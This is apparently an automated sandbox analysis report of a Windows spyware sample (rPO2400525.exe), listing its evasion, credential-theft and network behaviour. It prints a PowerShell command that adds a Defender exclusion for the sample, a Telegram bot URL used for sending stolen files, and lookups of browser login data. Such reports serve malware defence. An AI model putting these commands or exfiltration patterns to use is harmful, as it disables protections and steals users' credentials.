                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\rPO2400525.exe | Process information set: NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                Source: Yara match | File source: Process Memory Space: rPO2400525.exe PID: 6200, type: MEMORYSTR
                Source: C:\Users\user\Desktop\rPO2400525.exe | Memory allocated: 9E0000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\rPO2400525.exe | Memory allocated: 2630000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\rPO2400525.exe | Memory allocated: CB0000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\rPO2400525.exe | Memory allocated: 76A0000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\rPO2400525.exe | Memory allocated: 86A0000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\rPO2400525.exe | Memory allocated: 8860000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\rPO2400525.exe | Memory allocated: 9860000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\rPO2400525.exe | Memory allocated: 9DE0000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\rPO2400525.exe | Memory allocated: ADE0000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\rPO2400525.exe | Memory allocated: BDE0000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\rPO2400525.exe | Memory allocated: 1380000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\rPO2400525.exe | Memory allocated: 2CD0000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\rPO2400525.exe | Memory allocated: 4CD0000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\rPO2400525.exe | Thread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 5634
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 4036
                Source: C:\Users\user\Desktop\rPO2400525.exe TID: 6612 | Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6276 | Thread sleep time: -4611686018427385s >= -30000s
                Source: C:\Users\user\Desktop\rPO2400525.exe | Thread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                Source: rPO2400525.exe, 00000000.00000002.2083171797.0000000000A83000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\S)*
                Source: rPO2400525.exe, 00000005.00000002.3322690008.0000000001186000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
                Source: C:\Users\user\Desktop\rPO2400525.exe | Process token adjusted: Debug
                Source: C:\Users\user\Desktop\rPO2400525.exe | Memory allocated: page read and write | page guard

                HIPS / PFW / Operating System Protection Evasion

                Source: 0.2.rPO2400525.exe.3639970.1.raw.unpack, UltraSpeed.cs | Reference to suspicious API methods: MapVirtualKey(VKCode, 0u)
                Source: 0.2.rPO2400525.exe.3639970.1.raw.unpack, FFDecryptor.cs | Reference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(hModule, method), typeof(T))
                Source: 0.2.rPO2400525.exe.3639970.1.raw.unpack, FFDecryptor.cs | Reference to suspicious API methods: hModuleList.Add(LoadLibrary(text9 + "\\mozglue.dll"))
                Source: C:\Users\user\Desktop\rPO2400525.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\rPO2400525.exe"
                Source: C:\Users\user\Desktop\rPO2400525.exe | Process created: C:\Users\user\Desktop\rPO2400525.exe "C:\Users\user\Desktop\rPO2400525.exe"
                Source: C:\Users\user\Desktop\rPO2400525.exe | Queries volume information: C:\Users\user\Desktop\rPO2400525.exe VolumeInformation
                Source: C:\Users\user\Desktop\rPO2400525.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Source: C:\Users\user\Desktop\rPO2400525.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                Source: C:\Users\user\Desktop\rPO2400525.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                Source: C:\Users\user\Desktop\rPO2400525.exe | Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                Source: C:\Users\user\Desktop\rPO2400525.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                Source: C:\Users\user\Desktop\rPO2400525.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                Source: C:\Users\user\Desktop\rPO2400525.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
                Source: C:\Users\user\Desktop\rPO2400525.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                Stealing of Sensitive Information

                Source: Yara match | File source: 0.2.rPO2400525.exe.3650f90.4.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 5.2.rPO2400525.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 0.2.rPO2400525.exe.3639970.1.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 0.2.rPO2400525.exe.3650f90.4.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 0.2.rPO2400525.exe.3639970.1.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000005.00000002.3321986255.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000000.00000002.2096199828.0000000003639000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: Process Memory Space: rPO2400525.exe PID: 6200, type: MEMORYSTR
                Source: Yara match | File source: Process Memory Space: rPO2400525.exe PID: 2380, type: MEMORYSTR
                Source: C:\Users\user\Desktop\rPO2400525.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: C:\Users\user\Desktop\rPO2400525.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                Source: C:\Users\user\Desktop\rPO2400525.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

                Remote Access Functionality

                Source: Yara match | File source: 0.2.rPO2400525.exe.3650f90.4.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 5.2.rPO2400525.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 0.2.rPO2400525.exe.3639970.1.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 0.2.rPO2400525.exe.3650f90.4.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 0.2.rPO2400525.exe.3639970.1.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000005.00000002.3321986255.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000000.00000002.2096199828.0000000003639000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: Process Memory Space: rPO2400525.exe PID: 6200, type: MEMORYSTR
                Source: Yara match | File source: Process Memory Space: rPO2400525.exe PID: 2380, type: MEMORYSTR
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
                Native API
                1
                DLL Side-Loading
                1
                DLL Side-Loading
                11
                Disable or Modify Tools
                1
                OS Credential Dumping
                1
                File and Directory Discovery
                Remote Services11
                Archive Collected Data
                1
                Ingress Tool Transfer
                Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts11
                Process Injection
                1
                Deobfuscate/Decode Files or Information
                1
                Input Capture
                13
                System Information Discovery
                Remote Desktop Protocol1
                Data from Local System
                11
                Encrypted Channel
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)2
                Obfuscated Files or Information
                Security Account Manager1
                Query Registry
                SMB/Windows Admin Shares1
[MITRE ATT&CK matrix: grid residue from extraction. The tactic columns and the per-technique signature counts cannot be recovered from the flattened text. Technique cell names that survive intact include: Email Collection, Non-Application Layer Protocol, Software Packing, Security Software Discovery, Input Capture, Application Layer Protocol, Timestomp, Process Discovery, DLL Side-Loading, Virtualization/Sandbox Evasion, Masquerading, Application Window Discovery, System Network Configuration Discovery, Process Injection.]

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

Source | Detection | Scanner | Label | Link
rPO2400525.exe | 24% | Virustotal | | Browse
rPO2400525.exe | 22% | ReversingLabs | |
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
Name | IP | Active | Malicious | Antivirus Detection | Reputation
reallyfreegeoip.org | 104.21.64.1 | true | false | | high
checkip.dyndns.com | 193.122.130.0 | true | false | | high
checkip.dyndns.org | unknown | unknown | false | | high
Name | Malicious | Antivirus Detection | Reputation
http://checkip.dyndns.org/ | false | | high
https://reallyfreegeoip.org/xml/8.46.123.189 | false | | high
Name | Source | Malicious | Antivirus Detection | Reputation
https://reallyfreegeoip.org/xml/8.46.123.189l | rPO2400525.exe, 00000005.00000002.3323697493.0000000002D4E000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://checkip.dyndns.comd | rPO2400525.exe, 00000005.00000002.3323697493.0000000002D4E000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://checkip.dyndns.org/q | rPO2400525.exe, 00000000.00000002.2096199828.0000000003639000.00000004.00000800.00020000.00000000.sdmp, rPO2400525.exe, 00000005.00000002.3321986255.0000000000402000.00000040.00000400.00020000.00000000.sdmp | false | | high
http://reallyfreegeoip.orgd | rPO2400525.exe, 00000005.00000002.3323697493.0000000002D6C000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://reallyfreegeoip.org/xml/8.46.123.189d | rPO2400525.exe, 00000005.00000002.3323697493.0000000002D4E000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://reallyfreegeoip.org | rPO2400525.exe, 00000005.00000002.3323697493.0000000002D6C000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://checkip.dyndns.orgd | rPO2400525.exe, 00000005.00000002.3323697493.0000000002D4E000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://reallyfreegeoip.org | rPO2400525.exe, 00000005.00000002.3323697493.0000000002D4E000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://checkip.dyndns.org | rPO2400525.exe, 00000005.00000002.3323697493.0000000002D4E000.00000004.00000800.00020000.00000000.sdmp, rPO2400525.exe, 00000005.00000002.3323697493.0000000002D43000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://checkip.dyndns.com | rPO2400525.exe, 00000005.00000002.3323697493.0000000002D4E000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://checkip.dyndns.org/d | rPO2400525.exe, 00000005.00000002.3323697493.0000000002D4E000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | rPO2400525.exe, 00000000.00000002.2084107935.00000000027EF000.00000004.00000800.00020000.00000000.sdmp, rPO2400525.exe, 00000005.00000002.3323697493.0000000002CD1000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://api.telegram.org/bot-/sendDocument?chat_id= | rPO2400525.exe, 00000000.00000002.2096199828.0000000003639000.00000004.00000800.00020000.00000000.sdmp, rPO2400525.exe, 00000005.00000002.3321986255.0000000000402000.00000040.00000400.00020000.00000000.sdmp | false | | high
https://reallyfreegeoip.org/xml/ | rPO2400525.exe, 00000000.00000002.2096199828.0000000003639000.00000004.00000800.00020000.00000000.sdmp, rPO2400525.exe, 00000005.00000002.3321986255.0000000000402000.00000040.00000400.00020000.00000000.sdmp, rPO2400525.exe, 00000005.00000002.3323697493.0000000002D4E000.00000004.00000800.00020000.00000000.sdmp | false | | high
                                                      • No. of IPs < 25%
                                                      • 25% < No. of IPs < 50%
                                                      • 50% < No. of IPs < 75%
                                                      • 75% < No. of IPs
IP | Domain | Country | Flag | ASN | ASN Name | Malicious
193.122.130.0 | checkip.dyndns.com | United States | | 31898 | ORACLE-BMC-31898US | false
104.21.64.1 | reallyfreegeoip.org | United States | | 13335 | CLOUDFLARENETUS | false
                                                      Joe Sandbox version:42.0.0 Malachite
                                                      Analysis ID:1618720
                                                      Start date and time:2025-02-19 04:00:20 +01:00
                                                      Joe Sandbox product:CloudBasic
                                                      Overall analysis duration:0h 5m 36s
                                                      Hypervisor based Inspection enabled:false
                                                      Report type:full
                                                      Cookbook file name:default.jbs
                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:9
                                                      Number of new started drivers analysed:0
                                                      Number of existing processes analysed:0
                                                      Number of existing drivers analysed:0
                                                      Number of injected processes analysed:0
                                                      Technologies:
                                                      • HCA enabled
                                                      • EGA enabled
                                                      • AMSI enabled
                                                      Analysis Mode:default
                                                      Analysis stop reason:Timeout
                                                      Sample name:rPO2400525.exe
                                                      Detection:MAL
                                                      Classification:mal100.troj.spyw.evad.winEXE@7/6@2/2
                                                      EGA Information:
                                                      • Successful, ratio: 50%
                                                      HCA Information:
                                                      • Successful, ratio: 100%
                                                      • Number of executed functions: 89
                                                      • Number of non-executed functions: 21
                                                      Cookbook Comments:
                                                      • Found application associated with file extension: .exe
                                                      • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                                      • Excluded IPs from analysis (whitelisted): 2.18.97.153, 13.107.246.45, 4.245.163.56
                                                      • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                      • Execution Graph export aborted for target rPO2400525.exe, PID 2380 because it is empty
• Not all processes were analyzed, report is missing behavior information
                                                      • Report size getting too big, too many NtCreateKey calls found.
                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                      • Report size getting too big, too many NtReadVirtualMemory calls found.
Time | Type | Description
22:01:14 | API Interceptor | 1x Sleep call for process: rPO2400525.exe modified
22:01:16 | API Interceptor | 13x Sleep call for process: powershell.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
193.122.130.0 | Purchase Order 77809 for acknowledgment.exe | malicious | Snake Keylogger | checkip.dyndns.org/
193.122.130.0 | Quote_items1&2.bat.exe | malicious | Snake Keylogger, VIP Keylogger | checkip.dyndns.org/
193.122.130.0 | AWB_5771388044 Versanddokumente.exe | malicious | Snake Keylogger | checkip.dyndns.org/
193.122.130.0 | Swift Mesaji(1).pdf.exe | malicious | MassLogger RAT | checkip.dyndns.org/
193.122.130.0 | Purchase Order_2025.GZ | malicious | DBatLoader, Snake Keylogger, VIP Keylogger | checkip.dyndns.org/
193.122.130.0 | INQUIRY OFFER FOR BULK SUPPLY.exe | malicious | MassLogger RAT | checkip.dyndns.org/
193.122.130.0 | CUST543324_invoice.pdf.scr | malicious | MassLogger RAT | checkip.dyndns.org/
193.122.130.0 | DHL AWB Document_pdf.exe | malicious | GuLoader, Snake Keylogger | checkip.dyndns.org/
193.122.130.0 | useeeerrrrr.js | malicious | Snake Keylogger, VIP Keylogger | checkip.dyndns.org/
193.122.130.0 | 15300429772_20250121_09114163_HesapOzeti.exe | malicious | Snake Keylogger | checkip.dyndns.org/
104.21.64.1 | laser.ps1 | malicious | FormBook | www.lucynoel6465.shop/jgkl/
104.21.64.1 | UPDATED SOA.pdf.exe | malicious | FormBook | www.shlomi.app/t3l4/
104.21.64.1 | QUOTE OF DRY DOCK REPAIR.exe | malicious | FormBook | www.arryongro-nambe.live/ljgq/
104.21.64.1 | QUOTATION NO REQ-19-000640.exe | malicious | FormBook | www.askvtwv8.top/2875/
104.21.64.1 | Revised Order Confirmation.exe | malicious | FormBook | www.lucynoel6465.shop/hbfq/
104.21.64.1 | UPIlkrNpsh.exe | malicious | Unknown | xerecao.cc/
104.21.64.1 | engine.ps1 | malicious | FormBook | www.askvtwv8.top/b8fe/
104.21.64.1 | laserrrrrrrr.ps1 | malicious | FormBook | www.lucynoel6465.shop/jgkl/
104.21.64.1 | new quotation.exe | malicious | FormBook | www.shlomi.app/378r/
104.21.64.1 | PO 87877889X,pdf.Vbs.vbs | malicious | FormBook | www.lucynoel6465.shop/jgkl/
Match | Associated Sample Name / URL | Detection | Threat Name | Context
reallyfreegeoip.org | BAO SHUN Vessel Particulars.docx.scr.exe | malicious | MassLogger RAT | 104.21.112.1
reallyfreegeoip.org | VSVy.exe | malicious | Snake Keylogger, VIP Keylogger | 104.21.112.1
reallyfreegeoip.org | Purchase Order 77809 for acknowledgment.exe | malicious | Snake Keylogger | 104.21.80.1
reallyfreegeoip.org | Swift Copy_18.02.2025.exe | malicious | GuLoader, Snake Keylogger | 104.21.32.1
reallyfreegeoip.org | new purchase order21125.bat.exe | malicious | Snake Keylogger | 104.21.96.1
reallyfreegeoip.org | Quote_items1&2.bat.exe | malicious | Snake Keylogger, VIP Keylogger | 104.21.16.1
reallyfreegeoip.org | invoice packing list.exe | malicious | Snake Keylogger | 104.21.16.1
reallyfreegeoip.org | Draft doc PI ITS15235.vbs | malicious | DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger | 104.21.32.1
reallyfreegeoip.org | customer request.exe | malicious | Snake Keylogger | 104.21.16.1
reallyfreegeoip.org | Türk Havacılık ve Uzay Sanayii AŞ TEKLİF TALEBİ_xlsx.exe | malicious | Snake Keylogger, VIP Keylogger | 104.21.96.1
checkip.dyndns.com | BAO SHUN Vessel Particulars.docx.scr.exe | malicious | MassLogger RAT | 132.226.8.169
checkip.dyndns.com | VSVy.exe | malicious | Snake Keylogger, VIP Keylogger | 158.101.44.242
checkip.dyndns.com | Purchase Order 77809 for acknowledgment.exe | malicious | Snake Keylogger | 193.122.130.0
checkip.dyndns.com | Swift Copy_18.02.2025.exe | malicious | GuLoader, Snake Keylogger | 158.101.44.242
checkip.dyndns.com | new purchase order21125.bat.exe | malicious | Snake Keylogger | 132.226.8.169
checkip.dyndns.com | Quote_items1&2.bat.exe | malicious | Snake Keylogger, VIP Keylogger | 193.122.130.0
checkip.dyndns.com | invoice packing list.exe | malicious | Snake Keylogger | 193.122.6.168
checkip.dyndns.com | Draft doc PI ITS15235.vbs | malicious | DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger | 132.226.8.169
checkip.dyndns.com | customer request.exe | malicious | Snake Keylogger | 193.122.6.168
checkip.dyndns.com | Türk Havacılık ve Uzay Sanayii AŞ TEKLİF TALEBİ_xlsx.exe | malicious | Snake Keylogger, VIP Keylogger | 132.226.8.169
Match | Associated Sample Name / URL | Detection | Threat Name | Context
ORACLE-BMC-31898US | VSVy.exe | malicious | Snake Keylogger, VIP Keylogger | 158.101.44.242
